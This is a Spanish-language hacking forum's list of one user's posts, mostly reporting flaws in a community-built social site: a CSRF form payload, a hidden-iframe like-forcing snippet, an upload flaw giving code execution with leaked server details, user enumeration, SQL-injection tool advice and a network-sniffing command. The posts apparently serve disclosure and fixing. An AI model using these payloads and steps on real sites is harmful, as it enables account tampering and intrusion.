Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - hielasangre

#121
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

y para AXCESS:

porque mejor no haces caso de tu consejo (se consecuente): no sea tan lengüilargo en sugerencias que no se le han requerido



El usuario no se ha proclamado, pero ahí le va gran parte de lo que solicitó. Así que... es lo que se requirió.

Al parecer Ud. asume que el usuario desea vender su equipo, alterando la información de sus propiedades.


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

...la palabra no es molestar, es ESTAFAR


Nada indica tal cosa. Y lo invito a que pruebe lo contrario.

De hecho, si así fuere, el fin lo tendría truncado, por la parcialidad de la solución y el acceso al conocimiento.

Si con sus recelos lo hubiera proyectado de este modo:

-"Che... (es Ud. Argentino)
Y si alguien le comprara el equipo? Sabría sus reales datos técnicos?
"

Hubiera sido entendible, elegante, e inteligente de su parte. Alertando a otros sobre el asunto.

Intuyo que su suspicacia está vinculada al popular dicho de que el ladrón juzga por su condición.

Con esto pongo punto final; pues sería hacerle demasiado caso a sus pretensiones.

Quede con Dios y con sus pensamientos.

Nada indica tampoco que sea lo que usted dice...
No es estafa, entonces digamos lo siguiente: Es un engaño, o para qué más quisieras modificar los valores? Para mostrarle a un amigo que tiene una maquina más grande? Es un engaño de todas formas.
Por ultimo, el usuario no se proclamo ni para defenderse, a lo mejor si me hubiera explicado me hubiese disculpado, pero no lo hizo.
No necesito clases de vida, todos tenemos tierra bajo el zapato...
Decís: "Intuyo que su suspicacia está vinculada al popular dicho de que el ladrón juzga por su condición." , te enoja que yo me dirija a el como estafador, y sin embargo vos haces mención a que yo pienso como un ladrón por esa ser mi condición... Si  vas a alegar algo en mi contra, por lo menos deberías tener la valentía de expresar lo que pensas de mí y no esconderte detrás de la intuición.
Un saludo y como te dije, se consecuente.

#122
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buenas, Pues mi dudas es, Con fines esteticos quisiera cambiar el nombre del procesador, la cantidad de memoria ram, la Tarjeta grafica y La cantidad y el nombre del disco duro

Por ejemplo

Si es intel pentinium g4004t yo quisiera ponerle Intel core i7 3500k
De igual forma con la tarjeta de video y el almacenamiento del disco duro

No busco mejorar el rendimiento de la maquina, Solo Disfrazarla por asi decirlo.
Si hay algun ser de otra dimension que me ilumine se lo agradeceria muchisimo, He estado buscando esto por semanas...
Onda como los celulares chinos, te ayudaría, pero seguro vas a molestar a alguien que no sepa de computadoras. Así que mejor dedicate a trabajar..

Editado: para moderar lenguaje vulgar

NOTA: no tengo problema que se edite para cambiar el lenguaje vulgar, pero si lo van a hacer por lo menos que sea bien, la palabra no es molestar, es ESTAFAR


y para AXCESS:

porque mejor no haces caso de tu consejo (se consecuente): no sea tan lengüilargo en sugerencias que no se le han requerido
#123
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
PoC CSRF



Voy a tener que investigar como solucionar esto ya que no tengo ni idea de porque ocurre xD, en el caso del iframe de dar me gusta me suena claro ya que los parametros se envian por $_GET pero aqui que es por $_POST me has perdido jaja
Te molestaria pasarme el "payload" del boton ?

Si bartz! pare eso estamos, el payload no tiene gran ciencia!

Código: text

<html>
<body>
  <form action="http://afaik.cf/socialc0de/editarperfil.php" method="POST">
      <input type="hidden" name="nombre" value="pwned!" />
      <input type="hidden" name="usuario" value="pwned!" />
      <input type="hidden" name="profesion" value="pwned" />
      <input type="hidden" name="pais" value="pwned">
      <input type="submit" name="editar" value="No me toques!" />
    </form>
</body>
</html>




podrias emplear tokens en los formularios! y validar que sean enviados cada vez que mandas un request, de esa manera solucionando un error solucionas los dos :)

#124
PoC CSRF

#125
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Al no contar los likes con un token de validación o algo similar, con este sencillo código, las personas que visiten un link le darían like sin darse cuenta.

Código: text
<iframe src="http://afaik.cf/socialc0de/index.php?mg=1&&CodPost=104" style="height:200px;width:300px;"></iframe>

Eso funcionaria solo si se encuentran logueados en su cuenta, la funcion de agregar me gusta requiere el codigo de usuario que esta en la variable global $_SESSION



Este es un POC de lo que te señalaba, podría ocultar ese frame en algun sitio o enviarselo con alguna mentira a alguno de los usuarios..
#126
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Permite subir todo tipo de archivos, es por eso que pude realizar ejecución de código de manera arbitraria.
Vaya descuido xD
Felicidades bro !!
Ya sale el fixeo de esa vuln asi esto se pone cada vez mejor (:

btw, el error es en el archivo de la foto perfil solamente, no ? osea que en el subir de index.php no te lo permite o si ?

Asi parece! Creo que solo en el perfil!
#127
Permite subir todo tipo de archivos, es por eso que pude realizar ejecución de código de manera arbitraria.
#128
Código: text

Linux us-imm-web139.main-hosting.eu 3.10.0-714.10.2.lve1.5.19.3.el7.x86_64 #1 SMP Tue Aug 7 21:33:29 EDT 2018 x86_64

/home/u481171016/domains/afaik.cf/public_html/socialc0de/


#129
ah ok! entonces voy a crearme un usuario de pruebas, para poder hacer las pruebas bien :D
#130
hielasangre es el nick con el que me registre. A priori hay un erro de diseño e implementación:
El login permite la enumeración de usuarios validos, ya que si pongo un usuario que no existe dice "usuario inexistente", en cambio si pongo un usuario existente, con una contraseña equivocada me dice que el error es la contraseña... Entonces puedo adivinar los users, y este error (minimo) desemboca en otro, en la fuerza bruta de usuarios, ya que cuando no se puede entrar con un usuario valido, dice que la clave es incorrecta, y al no tener captcha se puede automatizar.
De momento solo eso, pero ya veré que mas se me ocurre.




Al no contar los likes con un token de validación o algo similar, con este sencillo código, las personas que visiten un link le darían like sin darse cuenta.

Código: text
<iframe src="http://afaik.cf/socialc0de/index.php?mg=1&&CodPost=104" style="height:200px;width:300px;"></iframe>
#131
Si, eso es totalmente cierto. Asumí que tiene conocimientos básicos que le permitan descubrir una inyección de forma manual, y después explotarlo. Romper más de la cuenta con SQLmap? A que te refieres con eso, porque más allá de explotar una sqli, subir una shell, o lo máximo seria crashear una tabla... Pero a lo mejor estoy subestimando el poder de la herramienta y se pueden hacer más cosas,si comentas más sobre eso te lo agradecería
#132
Nada de disculpas, al fin y al cabo esto se hace así, a prueba y error.
Lo primero que deberías de identificar con que tecnología fue desarrollado el sitio. Una vez tengas en claro eso podrías hacer un scaneo con algun scanner como el de owasp o parecido (acunetix o similar) y ver si devuelve un posible SQLi, para luego proceder a explotarlo con havij o sqlmap.
Esto deberías hacerlo una vez identificado el IP principal.
Por cierto, algo que te puede ayudar para esto es generar una lista de subdominios del sitio, y una vez que los tengas, realizas pings y checkas que tipo de respuesta te dan (si es como la ip del cloudflare o difiere)
Hace eso y seguimos con algo más.
De a bifes de come la vaca ;)

Saludos!
#133
Buenas, conta un poco mas que hiciste? solo fue atacar esas variables y ya? No hiciste un fingerprint para saber que SO esta alojando el sitio, si es hosting para solo ese sitio ? es compartido? tiene cloudflare?
Toda información que te ayude a perfilar mejor tu ataque es bienvenida.


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#134
Podrías implementar una solución de bajo coste: O en realidad ver varias soluciones y ver cual es la que mas se adecue.

Podrías hacer un script para mensajear a todos los números de whatsapp que estén en una base de datos.

Shield GSM + Arduino (con uno o  varios chips de esos que tienen packs de sms por x cantidad de dinero, igual esto depende del pais en el que te encuentres)

Telefono con android + algun software (este ultimo lo ignoro)

Eso es lo que se me ocurre hasta ahora... En las dos primeras te podria dar una mano, en las otras no.
#135
A que le llamas potente? A robar claves? PFffff xD
Bueno para no desvirtuar, deberías hacer caso a lo que te dicen más arriba porque a simple viste no esta creada la carpeta donde guardas lo que guarda el potente script, o bien creas la carpeta o identificas en donde esta el directorio temporal y guardas ahi lo que vayas a loggear.

LOL
#136
Porque no mejor?

Código: text

sudo nast -m -i eth0 (si estamos conectados por cable directos al router)
sudo nast -m -i wlan0 (si nos conectamos por WI-FI a la red)
#137
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hey si aun sigues vivo quizas me puedas ayudarme... Me sale este error:
C:\Python27>python You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Traceback (most recent call last):
  File "bot.py", line 3, in <module>
    ser = serial.Serial('COM3', 9600)
AttributeError: module 'serial' has no attribute 'Serial'

Tienes alguna idea de como solucionarlo????

Gracias :)
pip install serial
#138
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola a todos!

En este post voy a adjuntar un PDF que expone las vulnerabilidades de la tarjeta SUBE (Sistema Único Boleto Electrónico) Esta tarjeta se usa como medio de pago de transporte publico de Argentina.

Sin mas, adjunto el link:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Según yo, esto no se puede hacer (consulte con uno de los chicos qeu trabaja en nación servicios que es amigo personal y me dijo que ya lo habian fixeado aunque se comprimetió en replicar los pasos y pasar feedback)
Por mi parte ya tengo hardware para hacer la prueba, y grabaré el video de lo que sale (si efectivamente se puede hacer, o no)

#139
muy lindo todo.

Este es un fallo de diseño e implementación, no tanto así como un "bug" pero no hay que dejar de prestarle atención.
Por otro lado, %40 no es base64 es url encode

#140
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola, muy bueno el pdf!, me registré en la comunidad para ver de que se trataba, Saludos!

Para ver el PDF? Era suficiente con poner imprimir, y te salen los enlaces sin registrarte...
Yo creo que esto no sirve, voy a consultarlo con el que participó de la solución. Según tengo entendido las Mifare que utilizan ahora es la plus, no la 1k.
Pero una estimación es que esto ya no sirve. Aprovecho y les dejo algo para que si le saquen provecho  8)